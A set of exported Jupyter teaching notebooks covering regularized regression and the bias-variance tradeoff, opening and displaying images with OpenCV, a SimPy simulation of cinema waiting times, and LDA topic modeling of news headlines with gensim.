\sum_{j=0}^{m}|\theta_j|}$- **Ridge regression**: regularize using the l2 norm of theta:$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}))] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Let's translate these concepts to code in the next module! Module 3: The bias-variance tradeoff Learning objectives of this module:- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set.
###Code
# STEP 1: read in the data
# https://www4.stat.ncsu.edu/~boos/var.select/diabetes.html
# IID - independent and identically distributed dataset
import pandas as pd
df = pd.read_csv('https://www4.stat.ncsu.edu/~boos/var.select/diabetes.tab.txt',delimiter='\t')
print(df.head())
# separate out the feature matrix and the target variable
y = df.iloc[:,-1] # the last column is the target variable
X = df.iloc[:,:-1] # all but the last column are the features
print(y.head())
print(X.head())
# STEP 2: split the data
from sklearn.model_selection import train_test_split
X_other, X_test, y_other, y_test = train_test_split(X,y,test_size=0.2,random_state=1)
X_train, X_val, y_train, y_val = train_test_split(X_other,y_other,test_size=0.25,random_state=1)
# verify the results
print(X_train.shape) # 60% for training
print(X_val.shape) # 20% for validation
print(X_test.shape) # 20% for testing
# STEP 3: preprocess the data
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler() # initialize the scaler
X_train_prep = scaler.fit_transform(X_train)
X_val_prep = scaler.transform(X_val)
X_test_prep = scaler.transform(X_test)
# the _prep objects are now numpy arrays
# let's verify that all feature means are 0 and stds are 1
print(np.mean(X_train_prep,axis=0))
print(np.std(X_train_prep,axis=0))
print(np.mean(X_val_prep,axis=0)) # not exactly 0
print(np.std(X_val_prep,axis=0)) # not exactly 1
print(np.mean(X_test_prep,axis=0)) # not exactly 0
print(np.std(X_test_prep,axis=0)) # not exactly 1
# STEP 4:
# train linear regression models
# tune the regularization parameter
# calculate and visualize train and validation scores
# select the model that performs best on the validation set
# calculate the generalization error using the test set
from sklearn.linear_model import Lasso
from sklearn.metrics import mean_squared_error
alphas = np.logspace(-2,2,13)
print(alphas)
train_scores = []
val_scores = []
models = []
for alpha in alphas:
# initialize the model
linreg = Lasso(alpha=alpha)
# fit it to the training set
linreg.fit(X_train_prep,y_train)
# save the model
models.append(linreg)
# calculate and save train score
y_train_pred = linreg.predict(X_train_prep)
train_score = mean_squared_error(y_train,y_train_pred,squared=False)
train_scores.append(train_score)
# calculate and save val score
y_val_pred = linreg.predict(X_val_prep)
val_score = mean_squared_error(y_val,y_val_pred,squared=False)
val_scores.append(val_score)
# let's visualize the train and validation scores
plt.plot(alphas,train_scores,label='train score')
plt.plot(alphas,val_scores,label='validation score')
plt.xlabel('regularization strength (alpha)',fontsize=13)
plt.ylabel('RMSE',fontsize=13)
plt.semilogx()
plt.legend(fontsize=13)
plt.savefig('figures/bias-variance.png',dpi=300)
plt.show()
###Output
[1.00000000e-02 2.15443469e-02 4.64158883e-02 1.00000000e-01
2.15443469e-01 4.64158883e-01 1.00000000e+00 2.15443469e+00
4.64158883e+00 1.00000000e+01 2.15443469e+01 4.64158883e+01
1.00000000e+02]
###Markdown
The bias-variance tradeoff- high alpha (strong regularization): - the model is too simple - it performs poorly on both the training and validation sets (RMSEs are large) - high bias or low variance model- low alpha (weak regularization) - the model is too complex - it performs very well on the training set but it performs comparatively poorly on the validation set - low bias or high variance model- we are looking for the sweet spot in between - if your evaluation metric needs to be minimized (e.g., MSE, RMSE, logloss) - select the alpha with the smallest validation score - the corresponding model is the best - if your evaluation metric needs to be maximized (e.g., accuracy, R2) - select the alpha with the largest validation score - the corresponding model is the best Let's select the best model and calculate the generalization error
###Code
indx = np.argmin(val_scores)
print('best alpha:',alphas[indx]) # the best alpha value
print('best validation score:',val_scores[indx]) # the validation score
final_model = models[indx] # pull out the best model
y_test_pred = final_model.predict(X_test_prep)
gen_error = mean_squared_error(y_test,y_test_pred,squared=False)
print('the generalization error:',gen_error) # the error we expect from the model on previously unseen data
###Output
best alpha: 2.154434690031882
best validation score: 57.4873819354221
the generalization error: 54.72060685174691
|
00_Introduction_OpenDisplayImages.ipynb | ###Markdown
*This notebook is a part of a series, [Learning image manipulation in Python](find), that covers the basics of working with images in [OpenCV](https://docs.opencv.org/), [Matplotlib](https://matplotlib.org/users/index.html) and [Numpy](https://numpy.org/doc/).* Introduction: Opening and displaying images Installing librariesWe will primarily be working with OpenCV(cv2) for working with images.Installed openCV in Anaconda from here: https://anaconda.org/conda-forge/opencv`conda install -c conda-forge opencv`
###Code
from matplotlib import pyplot as plt
import cv2
print( cv2.__version__)
###Output
3.4.2
###Markdown
Loading imagesYou can use `cv2.imread()` to load an image file.
###Code
image = cv2.imread("images/rgb.jpg")
# Remember shape returns a tupple with the number of rows(height) first
height, width, channels = image.shape
print('%d high by %d wide with %d channels' % (height, width, channels))
###Output
512 high by 512 wide and 3 channels
###Markdown
Displaying imagesYou can use `matplotlib.pyplot` (referenced here as `plt`) to display the image. Note that cv2 orders the color channels blue, green then red and matplotlib uses red, green then blue. To address this you can use `cv2.cvtColor()` to change the order before di}splay.You can use `axis()` and `title()` methods of pyplot to adjust the appearance.
###Code
imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Display original image using matplotlib
plt.imshow(image)
plt.axis('off')
plt.title('Incorrect (BGR image)')
plt.show()
# Display converted image using matplotlib
plt.imshow(imageRGB)
plt.axis('off')
plt.title('Correct (RGB image)')
plt.show()
###Output
_____no_output_____
###Markdown
Loading images from URLThe openCV `cv2.imread()` method is able to read directly from a URL, but scikit-image (skimage) libraries `io.imread()` method is. This method load an image in RGB channel order so no conversion is needed.
###Code
from skimage import io
url = 'https://github.com/Algorithmic-Lens/Learning-image-manipulation-in-Python/raw/master/images/rgb.jpg'
remoteImage = io.imread(url)
# Display image using matplotlib
plt.imshow(remoteImage)
plt.axis('off')
plt.title('Correct (RGB image)')
plt.show()
###Output
512 by 512 pixels and 3 channels
|
src/simpy/cinema_example (realpython).ipynb | ###Markdown
Table of ContentsExample - Cinema SimulationDefine the problemBrainstorm the algorithmDefine librariesCode: class definitionDefine the functionRun the simulation Example - Cinema SimulationSimulating Real-World Processes in Python with SimPyWork through another example of using SimPy from [realpython.com](https://realpython.com/simpy-simulating-with-python/) Define the problemThe first step of running a simulation is to choose to process a model. In this example, we will imagine we are consulting for a small cinema chain, who have bad reviews due to long waiting times. The company has done some research, and found out that the average customer is willing to wait for at most **10 minutes** between arriving at the venue, and wanting to be sat down. Therefore, the problem has been formulated as helping to **get wait times below 10 minutes**. Brainstorm the algorithmBefore approaching the problem from a coding perspective, first work out how the process will work in real life. This will ensure that the code is an accurate reflection of what happens in real life. First, list the possible steps someone who visits the cinema would face.Steps on entering a cinema:1. **Arrive** at venue2. **Queue** to buy ticket3. **Buy** ticket4. **Queue** to get ticket checked 5. **Get** ticket checked6. Decided whether to get drinks/food: - If yes, **purchase drinks/food** - If no, go to the last step7. **Go** directly to the seatNow we have defined the steps above, we can see which parts of the process can be controlled by the cinema chain itself. An example would be how long a customer waits before buying their ticket or drinks/food, and this can be controlled by the number of staff serving these customers.There are parts of the process that cannot be controlled, such as when the customers are arriving at the venue, or in what volume they will arrive. Since we cannot accurately guess this number, this parameter will have to be filled with available data to determine an appropriate arrival time. Define libraries
###Code
import random
import statistics
import simpy
print(simpy.__version__)
###Output
4.0.1
###Markdown
The goal is to find the optimal number of employees giving an average wait time of **less than 10 minutes**. To define and solve this problem, we will collect a list of waiting times for each customer, from when they enter the venue to when they sit down.
###Code
waiting_times = []
###Output
_____no_output_____
###Markdown
Code: class definition Build the blueprint for the system, the environment in which the events will happen, such as people moving from one place to another. The environment is the name of the class.
###Code
class Cinema(object):
def __init__(self, env):
self.env = env
###Output
_____no_output_____
###Markdown
Consider what might be in the Cinema to add to the simulation. As outlined in the steps above, there will be: - staff to sell tickets/refreshments (drinks/food) - staff can sell the above items Therefore, from the cinema's perspective, the staff are a **resource** who assist the customers in **purchasing items**.Therefore, we frame the problem as how does the waiting time change depending on the number of customers in each simulation?So, the next variable to declare in the class is the `num_staff`, which is vital to the results of waiting time.
###Code
class Cinema(object):
def __init__(self, env, num_staff):
self.env = env
self.staff = simpy.Resource(env, num_staff)
###Output
_____no_output_____
###Markdown
We know that purchasing a ticket is going to take a certain amount of time, so either use historical data for this, or provide an estimate for this process time. This time can be a range, since the size of the party could be different. In this example we will estimate that it takes between 1 and 3 minutes to buy a ticket.We will use the `timeout` method from SimPy to mimic this behaviour.
###Code
class Cinema(object):
def __init__(self, env, num_staff):
self.env = env
self.staff = simpy.Resource(env, num_staff)
# customer must be passed as a parameter, since they cause the event to occur.
def purchase_ticket(self, customer):
yield self.env.timeout(random.randint(1,3))
###Output
_____no_output_____
###Markdown
Declare two more resources: - Staff to check tickets - Staff to serve food/drinksThese two tasks take a different amount of time, so as before either use historical data, or provide a best guess.
###Code
class Cinema(object):
def __init__(self, env, num_staff, num_checkers, num_servers):
self.env = env
self.staff = simpy.Resource(env, num_staff)
# ticket checker
self.checker = simpy.Resource(env, num_checkers)
# food/drinks server
self.server = simpy.Resource(env, num_servers)
# customer must be passed as a parameter, since they cause the event to occur.
def purchase_ticket(self, customer):
# process of a customer buying a ticket
yield self.env.timeout(random.randint(1, 3))
def check_ticket(self, customer):
# process of a member of staff checking a ticket
# this is defined as 3 seconds, don't need a random number
yield self.env.timeout(3/60)
def sell_food(self, customer):
# process of staff selling food
yield self.env.timeout(random.randint(1, 5))
###Output
_____no_output_____
###Markdown
Define the functionThe environment has been setup by the class above, with the resources and processes defined. All that is left is for a customer to enter the process.In the process terms, they will:- arrive at the venue- request a resource- wait for the process to complete- leaveCreate a function to simulate this process
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# varaible customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
###Output
_____no_output_____
###Markdown
Each of the processes from the Cinema should have corresponding requests in `go_to_cinema()`.The first process in the class is `purchase_ticket()`, using a `staff` resource. Below is a summary of the processes in the `cinema`, and the request made in the `go_to_cinema` method. | Process in cinema | Request in `go_to_cinema()`|| ------------- |:-------------:| | `purchase_ticket()` | request a member of `staff` | | `check_ticket()` | request a `checker`| | `sell_food()` | request a `server`| A member of `staff` is a shared resource in the process, so a customer can use the same member of staff, but this member of staff can only help one customer at a time. This needs to be accounted for.
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# varaible customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
with cinema.staff.request() as request:
yield request
yield env.process(cinema.purchase_ticket(customer))
###Output
_____no_output_____
###Markdown
For the above, we see:- `cinema.staff.request()`: the customer causes a request to call a member of staff, using a `staff` resource- `yield request`: customer waits for a `staff` to become available if all are currently in use- `yield env.process()`: the customer uses an available member of `staff` to complete the given process, in this case to purchase the ticket using the class method `cinema.purchase_ticket()`. Once the member of staff is then freed up, the `customer` will spend time buying their ticket. `env.process()` tells the simulation to go to the `Cinema` instance and run the `purchase_ticket()` process on the `customer`.The customer will repeat the **request, use, release** cycle to get their ticket checked.
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# varaible customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
with cinema.staff.request() as request:
yield request
yield env.process(cinema.purchase_ticket(customer))
with cinema.checker.request() as request:
yield request
yield env.process(cinema.check_ticket(customer))
###Output
_____no_output_____
###Markdown
The next part is to add the optional step of buying food/drinks, which is quite random, and we can add the randomness to the function
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# varaible customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
with cinema.staff.request() as request:
yield request
yield env.process(cinema.purchase_ticket(customer))
with cinema.checker.request() as request:
yield request
yield env.process(cinema.check_ticket(customer))
if random.choice([True, False]):
# here the outcome could either be that they go and buy food,
# or they simply go straight to their seat
with cinema.staff.request() as request:
yield request
yield env.process(cinema.sell_food(customer))
waiting_times.append(env.now - arrival_time)
###Output
_____no_output_____
###Markdown
Here, `env.now` will give the time at which the customer has finished all the processes and made it to their seat, so we add the overall time to the `waiting_times` list. Define a function to run the simulation, `run_cinema()` is responsible for creating an instance of the cinema, and generating customers until the simulation stops.We start the simulation with a few customers waiting at the cinema, as they might be there as soon as the box office opens. Then, customers will arrive in a certain timeframe, which we can guess will be on average every 12 seconds, so we will tell the function to wait this long before generating a new customer.
###Code
def run_cinema(env, num_staff, num_checkers, num_servers):
cinema = Cinema(env, num_staff, num_checkers, num_servers)
for customer in range(3):
# this will tell the simulation to move the customers through the cinema
env.process(go_to_cinema(env, customer, cinema))
while True:
yield env.timeout(0.2) # waiting time before a new customer comes
# increment the customer by 1, and generate the next person
customer += 1
env.process(go_to_cinema(env, customer, cinema))
###Output
_____no_output_____
###Markdown
To calculate the wait time, we have a list of waiting times (time taken for each customer to make it to their seat) `waiting_times`. Take the average to get the average wait time.Define a function to do this
###Code
def calculate_wait_time(waiting_times):
average_wait = statistics.mean(waiting_times)
# pretty print results
minutes, frac_mins = divmod(average_wait, 1)
seconds = frac_mins * 60
return round(minutes), round(seconds)
###Output
_____no_output_____
###Markdown
Specify a user input function to define the number of staff that will be working, in the roles of staff (`num_staff`), checkers (`num_checkers`) and servers (`num_servers`). We would like to change the above variables to see how the simulation changes. If a popular film has many customers lining up outside, how many people should be in the staff to sell the tickets? Will there be big queues of people waiting for food/drink? What value for `num_servers` will help ease the flow? Create a helper function for the user to change the values of the above parameters to try different scenarios.
###Code
def get_user_input():
num_staff = input("Input # staff working:")
num_checkers = input("Input # checkers working:")
num_servers = input("Input # servers working:")
params = [num_staff, num_checkers, num_servers]
if all(str(i).isdigit() for i in params):
params = [int(x) for x in params]
else:
print("Couldn't parse input. Simulation will use default values of \n"
"1 for staff, checker and server")
params = [1, 1, 1]
return params
###Output
_____no_output_____
###Markdown
Now we will create the final function, `main()`, which ensures the script runs in proper order when you execute it in the command line.
###Code
def main():
random.seed(42)
num_staff, num_checkers, num_servers = get_user_input()
env = simpy.Environment()
env.process(run_cinema(env, num_staff, num_checkers, num_servers))
env.run(until=90)
# print(waiting_times)
mins, secs = calculate_wait_time(waiting_times)
print(f"Running simulation... \n"
f"The average wait time is {mins} minutes and {secs} seconds")
###Output
_____no_output_____
###Markdown
Let's look at an overview of all of the functions and classes we have:- `Cinema`: class and blueprint for the environment to simulate. Contains information such as what resources are available, and what the processes are- `go_to_cinema`: this function makes a request to use a resource, goes through the full process, and then releases it to next customer- `run_cinema`: this controls the simulation. Using the `Cinema` class blueprint to create an instance of the cinema, and then it calls `go_to_cinema` to generate and move people through the cinema- `get_average_wait_time`: Function to find average time it takes someone to go through the cinema- `calculate_wait_time`: ensure the final output is easy to read. Run the simulationNow let's run the simulation by inputing the values requested. Running it with different values, we can see how the wait time can be reduced.
###Code
main()
main()
main()
main()
main()
main()
###Output
Input # staff working:30
Input # checkers working:10
Input # servers working:20
Running simulation...
The average wait time is 12 minutes and 58 seconds
|
Exercises/topic-modeling/Latent_dirichlet_allocation.ipynb | ###Markdown
Step 0: Latent Dirichlet Allocation LDA is used to classify text in a document to a particular topic. It builds a topic per document model and words per topic model, modeled as Dirichlet distributions. * Each document is modeled as a multinomial distribution of topics and each topic is modeled as a multinomial distribution of words.* LDA assumes that the every chunk of text we feed into it will contain words that are somehow related. Therefore choosing the right corpus of data is crucial. * It also assumes documents are produced from a mixture of topics. Those topics then generate words based on their probability distribution. Step 1: Load the datasetThe dataset we'll use is a list of over one million news headlines published over a period of 15 years. We'll start by loading it from the `abcnews-date-text.csv` file.
###Code
'''
Load the dataset from the CSV and save it to 'data_text'
'''
import pandas as pd
data = pd.read_csv('abcnews-date-text.csv', error_bad_lines=False);
# We only need the Headlines text column from the data
data_text = data[:300000][['headline_text']];
data_text['index'] = data_text.index
documents = data_text
###Output
_____no_output_____
###Markdown
Let's glance at the dataset:
###Code
'''
Get the total number of documents
'''
print(len(documents))
documents[:5]
###Output
_____no_output_____
###Markdown
Step 2: Data Preprocessing We will perform the following steps:* **Tokenization**: Split the text into sentences and the sentences into words. Lowercase the words and remove punctuation.* Words that have fewer than 3 characters are removed.* All **stopwords** are removed.* Words are **lemmatized** - words in third person are changed to first person and verbs in past and future tenses are changed into present.* Words are **stemmed** - words are reduced to their root form.
###Code
'''
Loading Gensim and nltk libraries
'''
# pip install gensim
import gensim
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
import numpy as np
np.random.seed(400)
import nltk
nltk.download('wordnet')
###Output
[nltk_data] Downloading package wordnet to /root/nltk_data...
[nltk_data] Unzipping corpora/wordnet.zip.
###Markdown
Lemmatizer ExampleBefore preprocessing our dataset, let's first look at an lemmatizing example. What would be the output if we lemmatized the word 'went':
###Code
print(WordNetLemmatizer().lemmatize('went', pos = 'v')) # past tense to present tense
###Output
go
###Markdown
Stemmer ExampleLet's also look at a stemming example. Let's throw a number of words at the stemmer and see how it deals with each one:
###Code
stemmer = SnowballStemmer("english")
original_words = ['caresses', 'flies', 'dies', 'mules', 'denied','died', 'agreed', 'owned',
'humbled', 'sized','meeting', 'stating', 'siezing', 'itemization','sensational',
'traditional', 'reference', 'colonizer','plotted']
singles = [stemmer.stem(plural) for plural in original_words]
pd.DataFrame(data={'original word':original_words, 'stemmed':singles })
'''
Write a function to perform the pre processing steps on the entire dataset
'''
def lemmatize_stemming(text):
return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
# Tokenize and lemmatize
def preprocess(text):
#result=[]
#for token in gensim.utils.simple_preprocess(text) :
# if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3:
# TODO: Apply lemmatize_stemming() on the token, then add to the results list
# result.append(lemmatize_stemming(token))
result = [ lemmatize_stemming(token)
for token in gensim.utils.simple_preprocess(text)
if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3 ]
return result
'''
Preview a document after preprocessing
'''
document_num = 4310
doc_sample = documents[documents['index'] == document_num].values[0][0]
print("Original document: ")
words = []
for word in doc_sample.split(' '):
words.append(word)
print(words)
print("\n\nTokenized and lemmatized document: ")
print(preprocess(doc_sample))
documents
###Output
_____no_output_____
###Markdown
Let's now preprocess all the news headlines we have. To do that, let's use the [map](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.map.html) function from pandas to apply `preprocess()` to the `headline_text` column**Note**: This may take a few minutes (it take 6 minutes on my laptop)
###Code
# TODO: preprocess all the headlines, saving the list of results as 'processed_docs'
processed_docs = documents['headline_text'].map(lambda headline: preprocess(headline))
'''
Preview 'processed_docs'
'''
processed_docs[:10]
###Output
_____no_output_____
###Markdown
Step 3.1: Bag of words on the datasetNow let's create a dictionary from 'processed_docs' containing the number of times a word appears in the training set. To do that, let's pass `processed_docs` to [`gensim.corpora.Dictionary()`](https://radimrehurek.com/gensim/corpora/dictionary.html) and call it '`dictionary`'.
###Code
'''
Create a dictionary from 'processed_docs' containing the number of times a word appears
in the training set using gensim.corpora.Dictionary and call it 'dictionary'
'''
dictionary = gensim.corpora.Dictionary(processed_docs)
'''
Checking dictionary created
'''
count = 0
for k, v in dictionary.iteritems():
print(k, v)
count += 1
if count > 10:
break
###Output
0 broadcast
1 communiti
2 decid
3 licenc
4 awar
5 defam
6 wit
7 call
8 infrastructur
9 protect
10 summit
###Markdown
** Gensim filter_extremes **[`filter_extremes(no_below=5, no_above=0.5, keep_n=100000)`](https://radimrehurek.com/gensim/corpora/dictionary.htmlgensim.corpora.dictionary.Dictionary.filter_extremes)Filter out tokens that appear in* less than no_below documents (absolute number) or* more than no_above documents (fraction of total corpus size, not absolute number).* after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None).
###Code
'''
OPTIONAL STEP
Remove very rare and very common words:
- words appearing less than 15 times
- words appearing in more than 10% of all documents
'''
# TODO: apply dictionary.filter_extremes() with the parameters mentioned above
dictionary.filter_extremes(no_below=15, no_above=0.1)
dictionary.token2id
###Output
_____no_output_____
###Markdown
** Gensim doc2bow **[`doc2bow(document)`](https://radimrehurek.com/gensim/corpora/dictionary.htmlgensim.corpora.dictionary.Dictionary.doc2bow)* Convert document (a list of words) into the bag-of-words format = list of (token_id, token_count) 2-tuples. Each word is assumed to be a tokenized and normalized string (either unicode or utf8-encoded). No further preprocessing is done on the words in document; apply tokenization, stemming etc. before calling this method.
###Code
'''
Create the Bag-of-words model for each document i.e for each document we create a dictionary reporting how many
words and how many times those words appear. Save this to 'bow_corpus'
'''
# TODO
bow_corpus = list( map(lambda doc: dictionary.doc2bow(doc), processed_docs))
#bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs]
'''
Checking Bag of Words corpus for our sample document --> (token_id, token_count)
'''
print(processed_docs[document_num])
bow_corpus[document_num]
'''
Preview BOW for our sample preprocessed document
'''
# Here document_num is document number 4310 which we have checked in Step 2
bow_doc_4310 = bow_corpus[document_num]
for i in range(len(bow_doc_4310)):
print("Word {} (\"{}\") appears {} time.".format(bow_doc_4310[i][0],
dictionary[bow_doc_4310[i][0]],
bow_doc_4310[i][1]))
###Output
Word 71 ("bushfir") appears 1 time.
Word 107 ("help") appears 1 time.
Word 462 ("rain") appears 1 time.
Word 3530 ("dampen") appears 1 time.
###Markdown
Step 3.2: TF-IDF on our document set While performing TF-IDF on the corpus is not necessary for LDA implemention using the gensim model, it is recemmended. TF-IDF expects a bag-of-words (integer values) training corpus during initialization. During transformation, it will take a vector and return another vector of the same dimensionality.*Please note: The author of Gensim dictates the standard procedure for LDA to be using the Bag of Words model.* ** TF-IDF stands for "Term Frequency, Inverse Document Frequency".*** It is a way to score the importance of words (or "terms") in a document based on how frequently they appear across multiple documents.* If a word appears frequently in a document, it's important. Give the word a high score. But if a word appears in many documents, it's not a unique identifier. Give the word a low score.* Therefore, common words like "the" and "for", which appear in many documents, will be scaled down. Words that appear frequently in a single document will be scaled up.In other words:* TF(w) = `(Number of times term w appears in a document) / (Total number of terms in the document)`.* IDF(w) = `log_e(Total number of documents / Number of documents with term w in it)`.** For example *** Consider a document containing `100` words wherein the word 'tiger' appears 3 times. * The term frequency (i.e., tf) for 'tiger' is then: - `TF = (3 / 100) = 0.03`. * Now, assume we have `10 million` documents and the word 'tiger' appears in `1000` of these. Then, the inverse document frequency (i.e., idf) is calculated as: - `IDF = log(10,000,000 / 1,000) = 4`. * Thus, the Tf-idf weight is the product of these quantities: - `TF-IDF = 0.03 * 4 = 0.12`.
###Code
'''
Create tf-idf model object using models.TfidfModel on 'bow_corpus' and save it to 'tfidf'
'''
from gensim import corpora, models
# TODO
tfidf = models.TfidfModel(bow_corpus) # fit a model
tfidf
'''
Apply transformation to the entire corpus and call it 'corpus_tfidf'
'''
# TODO
corpus_tfidf = tfidf[bow_corpus] # apply model to tbow_corpus
corpus_tfidf
'''
Preview TF-IDF scores for our first document --> --> (token_id, tfidf score)
'''
from pprint import pprint
for doc in corpus_tfidf:
pprint(doc)
break
###Output
[(0, 0.5959813347777092),
(1, 0.39204529549491984),
(2, 0.48531419274988147),
(3, 0.50554610985785686)]
###Markdown
Step 4.1: Running LDA using Bag of Words We are going for 10 topics in the document corpus.** We will be running LDA using all CPU cores to parallelize and speed up model training.**Some of the parameters we will be tweaking are:* **num_topics** is the number of requested latent topics to be extracted from the training corpus.* **id2word** is a mapping from word ids (integers) to words (strings). It is used to determine the vocabulary size, as well as for debugging and topic printing.* **workers** is the number of extra processes to use for parallelization. Uses all available cores by default.* **alpha** and **eta** are hyperparameters that affect sparsity of the document-topic (theta) and topic-word (lambda) distributions. We will let these be the default values for now(default value is `1/num_topics`) - Alpha is the per document topic distribution. * High alpha: Every document has a mixture of all topics(documents appear similar to each other). * Low alpha: Every document has a mixture of very few topics - Eta is the per topic word distribution. * High eta: Each topic has a mixture of most words(topics appear similar to each other). * Low eta: Each topic has a mixture of few words.* ** passes ** is the number of training passes through the corpus. For example, if the training corpus has 50,000 documents, chunksize is 10,000, passes is 2, then online training is done in 10 updates: * `1 documents 0-9,999 ` * `2 documents 10,000-19,999 ` * `3 documents 20,000-29,999 ` * `4 documents 30,000-39,999 ` * `5 documents 40,000-49,999 ` * `6 documents 0-9,999 ` * `7 documents 10,000-19,999 ` * `8 documents 20,000-29,999 ` * `9 documents 30,000-39,999 ` * `10 documents 40,000-49,999`
###Code
# LDA mono-core -- fallback code in case LdaMulticore throws an error on your machine
# lda_model = gensim.models.LdaModel(bow_corpus,
# num_topics = 10,
# id2word = dictionary,
# passes = 50)
# LDA multicore
'''
Train your lda model using gensim.models.LdaMulticore and save it to 'lda_model'
'''
# TODO
lda_model = gensim.models.LdaMulticore(bow_corpus,
num_topics = 10,
id2word = dictionary,
passes = 2,
workers = 2)
'''
For each topic, we will explore the words occuring in that topic and its relative weight
'''
for idx, topic in lda_model.print_topics(-1):
print("Topic: {} \nWords: {}".format(topic, idx ))
print("\n")
###Output
Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash"
Words: 0
Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park"
Words: 1
Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall"
Words: 2
Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat"
Words: 3
Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust"
Words: 4
Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial"
Words: 5
Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit"
Words: 6
Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt"
Words: 7
Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise"
Words: 8
Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join"
Words: 9
###Markdown
Classification of the topics Using the words in each topic and their corresponding weights, what categories were you able to infer?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 4.2 Running LDA using TF-IDF
###Code
'''
Define lda model using corpus_tfidf, again using gensim.models.LdaMulticore()
'''
# TODO
lda_model_tfidf = gensim.models.LdaMulticore(corpus_tfidf,
num_topics = 10,
id2word = dictionary,
passes = 2,
workers = 2)
'''
For each topic, we will explore the words occuring in that topic and its relative weight
'''
for idx, topic in lda_model_tfidf.print_topics(-1):
print("Topic: {} Word: {}".format(idx, topic))
print("\n")
###Output
Topic: 0 Word: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" + 0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season"
Topic: 1 Word: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign"
Topic: 2 Word: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash"
Topic: 3 Word: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg"
Topic: 4 Word: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station"
Topic: 5 Word: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit"
Topic: 6 Word: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan"
